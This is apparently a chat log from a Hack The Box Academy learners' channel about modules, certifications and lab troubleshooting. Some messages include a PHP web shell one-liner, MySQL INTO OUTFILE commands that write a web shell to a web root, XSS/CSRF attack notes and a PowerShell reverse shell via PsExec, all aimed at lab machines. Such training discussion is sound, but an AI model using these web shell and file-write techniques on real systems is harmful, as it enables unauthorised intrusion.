P.S. I work as a penetration tester, and I will say that this path (along with the bug bounty hunter path) helps me a lot in my job, especially the web attacks part and attacking common applications.
If you have some questions dm
by the way if someone has some advice for the OSCP preparation I'm all ears 🫶
Is there a reason I cannot comment on the pro-labs discussions? Dante is not working correctly.
Read and follow #welcome
Machine's duration ran out now.
Hello, I'm having trouble with initial access in the Advanced XSS and CSRF Exploitation skill assessment.
I'm currently attacking the ||/files.php page. Looking at the dialogue "Your personal file storage (Note: Admins are able to access your files for security reasons)", I assumed there might be an admin bot scraping the uploaded files on this page. Trying XSS, I uploaded one text file with Javascript to exploit a CSRF vuln on the user promotion GET endpoint and another file to execute that Javascript from within the webapp to bypass CSP.|| The execution of this JS works from my side if I access the file, but I'm unable to escalate my rights through this vector via XSS -> CSRF.
Also tried sending payloads from exploitserver.htb/exploit for multiple endpoints on vulnerablesite.htb but I can't get around the ||Strict SameSite cookie. To achieve XSS from the upload page.||
Sanity check, am I hyper focused on the wrong thing?
Five hours later the file inclusion skills assessment is done.
Brain is fuzzed after 4 hours of getting nowhere only to realise I had been looking at the info I needed for the intended path for about 3.5 of those hours.
└──╼ $smbmap -H 10.129.203.6 -r GGJ
[+] IP: 10.129.203.6:445 Name: 10.129.203.6
Disk Permissions Comment
---- ----------- -------
GGJ READ ONLY
.\GGJ\*
dr--r--r-- 0 Tue Apr 19 23:33:55 2022 .
dr--r--r-- 0 Mon Apr 18 19:08:30 2022 ..
fr--r--r-- 3381 Tue Apr 19 23:33:03 2022 id_rsa
if i look at this output, am i mistaken in thinking that id_rsa should be downloadable?
world has read permissions on it and therefore if i can log on with smbclient, a simple "get id_rsa" should download the file?
in any case file is not downloadable. going to try a different server
hello guys
I have one question in module API ATTACKS - skill assessment
about the content flag, is it going to be in file:///flag.txt?
the question gives you the path of the file
I guess my question is.... should i be able to download it or is that part of the assessment
i'm done, thanks
ATTACKING COMMON APPLICATIONS-Other Notable Application
i am stuck at the 2nd question
i open the url but its a 404 page i don't know what to do
where can i find the Portswigger Labs course
someone recommended me the course last week and i wanted to search it but didnt find it
On the website of Portswigger
oh😅
is it for free?
Htb offer students discount? Or any other discount
I am asking about certificate discount
I'm afraid not, to my knowledge
Means no?
Currently only the Academy Student Subscription is available. As far as I know, there are no discounts for students for anything else
im doing the skill assessment of the session attacks
i dont wanna write something that will spoil anyone
Alright, so can anyone tell me if i pick cpts as my first certification it will be right decision?
I have some knowledge but just a some basic level.
I want to be a pentester
I don't believe there is a right or wrong decision, depends on what you want to get out of it
I want to clear it as my first certificate and step in to industry level pentesting.
Can u please tell this.
...
CPTS is certainly a very good choice for knowledge. If it is about having a certificate that is often asked for by HR, then OSCP might be the better choice.
Tons of comparisons on youtube. You can do some research there before committing
Nope i want skills
I want a good knowledge
https://www.youtube.com/live/wwmCHeYd1I4
https://www.youtube.com/watch?v=-5s2R0Mldgw
https://www.brunorochamoura.com/posts/road-to-cpts/
https://eatthebuffet.github.io/posts/CPTS-or-OSCP/
https://0xfa7e.github.io/post/cpts-vs-oscp/
https://xre0us.io/posts/cpts-oscp-and-you/
Because some people state on YouTube that do PNPT before doing CPTS.
But i directly want to do CPTS
Then do it
Ok let's have a beast mode on hehe
Bunny can you tell me the cpts whole package which contain module + cert
That is for lifetime access to module or for just cert.
- if i buy student subscription will i get access to all modules necessary to pass cpts?
It teach from beginner to advance?
can someone help me figure out something in private regarding the skill assessment of session hijacking?
Yes, with this subscription you have access to all modules up to Tier II
how can i get cubes
By purchase or subscription
you can get cubes by purchasing them directly, from one of the monthly subscriptions (except student sub), or from referrals
Send me a DM
if you have an annual sub, completing modules will give you cubes
Did u manage to solve WSUS part?
Hello there! I found a broken box in the module "Windows Privilege Escalation" of the academy. Where can I report it???
Likely not broken but #1234357888114364508
Thank you @fathom pendant!
any nudge would be greatly appreciated for this. Been stuck on the assessment for a few days.
does the course "introduction to web applications" reward more than 10 cubes?
Module: Attacking Common Services
Easy Assessment; how to approach it - fuzzed domain --> no promising results; ports ftp, smtp, mysql all need creds --> bruteforcing?
It's a tier 0 module yeah?
yea
Smtp might contain a user
are there any tier 0 module that gives back more than 10?
No
i want to get the tier 2 XSS module course but i dont have enough cubes 😦
is there no other way? because i dont know if i want to spend 5$ yet...tbh if its possible im trying to avoid it, at least before i spend money i want to check if i even have the patience and can succeed in this.. 🙂
You can buy cubes outright, but at a significantly higher cost
Nope
No other way to gain cubes
well thats a bummer
I mean, htb wouldn't make money that way
¯\_(ツ)_/¯
And comparatively, it's on the cheaper end of learning platforms
yea true 🙂 , just checked if perhaps there was a way but you are right its true that they give us a lot of courses with good information
And the t0 modules build solid foundations
then ofc they should receive a certain profit
The t0 modules would be considered the "free" tier
yea true.... although i do have the foundation so i know like the stuff they teach in the foundation
I think I need a hint on the Attacking Common Services. FTP section
I have tried bruteforcing services I have found with the username and password list in the resources
Did you try anonymous?
is there a prefered user list to be used from Seclists for getting valid username? - tool uses smtp-user-enum?
The only service you should attack on that section is FTP
There doesn't seem to be an ftp service running on the box
The provided list from the resources button
Then restart the box
As you can't attack FTP if FTP isn't running
lol..
i guess... :). I thought maybe there was an ftp server behind the main machine
Or if it is running, you might need to specify the alt port
It's not
All the stuff in this module (not skill assessment) should be outward facing
ok thank you for th hint
Are you only scanning for port 21?
└──╼ $sudo nmap -p- 10.129.203.6
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 00:09 CEST
Nmap scan report for 10.129.203.6
Host is up (0.085s latency).
Not shown: 63906 closed tcp ports (reset), 1625 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Reset box
ok thnks
The ftp service is on an alt port (indicated by Q1)
You did -p- yeah?
mind u i didn't scan for udp ports but I was expecting ftp to be using tcp
yeah i did -p-,
It'll be tcp
mind u there are implementations of ftp over udp as a transport
Iirc this one can take a few resets sometimes
As a note, when using ftp on an alt port the syntax is
ftp [ip] [port]
👍
found it
all done and moved on from attacking ftp service
That's a bit frustrating though
Might be worth having a tip saying to reset machine if don't find ftp service
python3 -m http.server --directory /home/kali/file.txt
Trying to upload a file on the python webserver I just created, but im receiving error messages
Network services module, linux fundamentals
You don't specify the file. You're setting up a server. If you only want certain files available then try setting up a /tmp/www folder, open a terminal there, then run python3 -m http.server
Everything in that tmp folder will be available for download, so put whatever files you want available
Hi everyone! Please i need help with a question in DACL 1. The question is: "Using Pedro's account, submit the password of Moly's account.". I don't understand the part 'using Pedro's account'. From the Kerberoasting attack I submitted Moly's password, which is Passw@#$...etc, but what I don't understand (I don't speak English very well) is the part about: sending from Pedro's account. Can you please help me with that, what "sending from Pedro's account" means. Thank you so much.
no
I'm stuck tried everything but for some reason I can't get a revshell on backup server
So upon server creation every folder in the directory I was in will be available on the server?
It's a very annoying skill assessment 😰 I was able to get a PowerShell revshell but I had to be very, very, very patient for the payload to execute. I didn't do anything special not mentioned in the module except waiting a long time
yes. the folder you start the server from will become the webroot of the server
what if I was in root
i.e. if you start the server from the /tmp/www folder, and there are files and folders in there, everything in /tmp/www will be available
well i wouldnt recommend that, but i assume so. tbh, ive never tried seeing what you can do with folders in the webserver
i just do it from my users home folder, but some will create a directory in tmp
Im getting the address already in use error
obviously you start a webserver to open access to things in that folder, so you can upload. but that would also leave your folder exposed. during a skills assessment/HTB question, or a box, you'd be fine. but it obviously goes both ways
I see
what do you mean?
OSError: [Errno 98] Address already in use
that means the port youre trying to use is already in use
python -m http.server <port>
i usually just use 8000 or some variation of it
i think if you use anything within 1-1000, you need sudo as you usually need elevated privileges to forward packets to those protected ports
Thats interesting
Thanks, i made a website on port 8989
I can see the information in my home directory
Use a different port, maybe start the http server in the users home directory, not in root. Also make sure whatever you're trying to host is in the same directory where you're starting your http server
Bro got banned 💀
ty @sterile solstice
blood sacrifice
For some reason wsus point that backup executed the update but nothing works
did you use powershell or the PsExec binary? And was the host with nc on windows or on your linux?
I used psexec to spawn powershell.exe and run a base64-encoded command... I would have tested more options if I didn't have to wait so long between each attempt
I literally did that lol, will try that again some other time, much thanks
This is a somewhat flawed question im aware, but how long should a module take?
Im going through the linux fundamentals at about 2-3 sections a day with notes
Should I be going faster?
as long as it needs to take you. it's more important to worry about understanding the content than worrying about how fast you're going through it
Understood
If you're using pwnbox, port 80 is in use to serve you the vm in the browser
I'm currently in Linux Fundamentals. I have supplied the correct command and syntax for this question - How many total packages are installed on the target system? The command I used is apt list --installed | wc -l and the answer is 3218, but it's incorrect. Could anyone provide some help?
Sounds like you aren't ssh to the target
ssh user@targetip
The syntax should be given to you in the reading
Ok, I'll read back through the module again Thank you!
The credentials as well are given above the first question
Im on the working with webservices module
"Find a way to start a simple HTTP server inside Pwnbox or your local VM using "npm". Submit the command that starts the web server on port 8080 (use the short argument to specify the port number). "
ive tried downloading npm but it seems to be irrelevant in answering the question
It's asking for the command you'd run
Got a question regarding php web shell; no matter which command i input it always prints out a lot of stuff - can someone help me out with this?
which section
Module: Attacking common services - easy lab
make sure your webshell is formatted correctly
<?php system($_REQUEST['cmd']); ?>
is this wrong?
should it be; <?php system($_GET['cmd']); ?>
yes
doesnt make a difference; outputs the same
Did you upload to a new location/name?
Depending on configuration, it won't overwrite a file that exists
hello, I am getting this issue when trying to use ssh. It says "...port 22: connection refused"
help
Does the section say to use a different port like 2222?
Or the port shown with ip:port
nah it doesnt say to use a specific port
no the target just spawned as ip
INTO OUTFILE 'C:\xampp\htdocs\webshell.php';
and second on INTO OUTFILE 'C:\xampp\htdocs\shell.php';
are you connected to the vpn? and module and section?
And I take it you saved the appropriate change to the shell?
yes it did
Otherwise I suggest restarting target with a blank slate and try again
the module and section is Linux fundamentals - working with files and directories
nvm i got it working, thank you
@fathom pendant does it make a difference which table to use for union injection?
or do the columns just has to match?
a sql database can have multiple tables. so if you're looking for something specific (like a flag) then yes, you must be in the correct database
I'm stuck on the Linux Privesc logrotate question. I've found the config file, and created a logfile greater than the maxsize in the config but it doesn't seem to rotate. I'm not sure how to get this to trigger.
Edit: Config file was a furphy, found the right logfile, triggered the payload and waited quite a time to get a shell. Only realised after I'd given up and started looking elsewhere and then went back to see a # prompt in the terminal scrollback.
@cloud urchin dont want to look up a flag - just want to use table for union injection
for uploading a webshell
Just need to match column numbers
so it does - otherwise it wouldn't work...
But you don't need it if you have full access to the db
Union select is generally if you only have input form access and SQLi
so i have to find the flag in the db?
Read the question carefully for what it wants
wants the content of the flag.txt - isn't it?
nevertheless - the web shell doesnt work - even if i change to: <?php echo shell_exec('whoami'); ?> --- it always prints out the same stuff
You're thinking too hard
But also webshell should work
<?php system($_GET['cmd']); ?> should work just fine
Also make sure you put the select command in double quotes
So it doesn't break your quotes in the php command
dont understand - select command in double quotes?
Select "<?php ...?>" into outfile
test
SELECT help_topic_id, name, help_category_id, description, example, url FROM mysql.help_topic UNION ALL SELECT 0, "<?php echo shell_exec('whoami'); ?> ", 0, '', '', '' INTO OUTFILE 'C:\\xampp\\htdocs\\b.php';
But it should work
Yeah, you're doing too much with it
You don't need to do a union select with it
That's why you're getting a bunch of extra shit
its a cooperation with gpt - lol
Just select "<?php ...?>" into outfile 'c:\\xampp\\htdocs\\shell.php'
yea gpt usually tends to do way to much
Shocker, gpt is too much
The output of the cmd is likely buried somewhere in the output
As you're selecting a bunch of extra shit
Btw I believe this command for a shell is given in some form in the sql section
Good night all!
@fathom pendant guess youre referencing this one: https://academy.hackthebox.com/module/33/section/793
Nope
It's in the common services module
Has nothing to do with the methods of sqli, which your payload also would have the same difficulties with
Well, at least the same result
You don't need to select anything from any table btw
just this should work
you don't need to do sql injection when you already have a sql shell
Yep
GPT moment
yep works fine - the easy way - but how should you know this stuff if its mentioned just in the sql module?
for me its not that easy - lol
i mean easy assessment
It's gone over in the sql section of the common services module
Specifically subsection; MySQL -- write local files
just saw it in my cheatsheet
The example is for a linux machine, but I mean the concept is the same
Btw I wasn't referring to the sql module, but rather the sql section of the common service module
As that module you linked was specifically for sql injection; which is different
how do you say - the devil is in the details - lol
In other words; reading is hard
there is so much stuff in the modules - how to know where to look...
Take good notes
Nope
Take it up with your school
Well I didn’t ask for ur input I asked if someone can help